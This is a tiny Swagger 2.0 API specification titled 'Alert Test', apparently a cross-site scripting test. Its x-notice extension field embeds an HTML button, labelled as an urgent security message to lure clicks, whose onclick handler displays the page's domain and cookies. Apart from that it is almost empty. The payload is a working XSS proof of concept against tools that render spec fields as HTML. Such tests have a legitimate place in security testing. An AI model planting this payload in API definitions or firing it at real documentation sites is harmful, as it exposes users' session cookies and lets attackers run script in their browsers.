swagger: '2.0'
info:
  title: Alert Test
  x-notice: |
    <button style="padding:12px 24px; background:#d32f2f; color:white; border:none; border-radius:6px; font-size:16px; cursor:pointer; margin:20px auto; display:block;"
            onclick="alert('XSS from x-notice!\nDomain: ' + document.domain + '\nCookie: ' + document.cookie)">
      ⚠️ Important Security Message – Click Here
    </button>
  version: 1.0.0
paths: {}
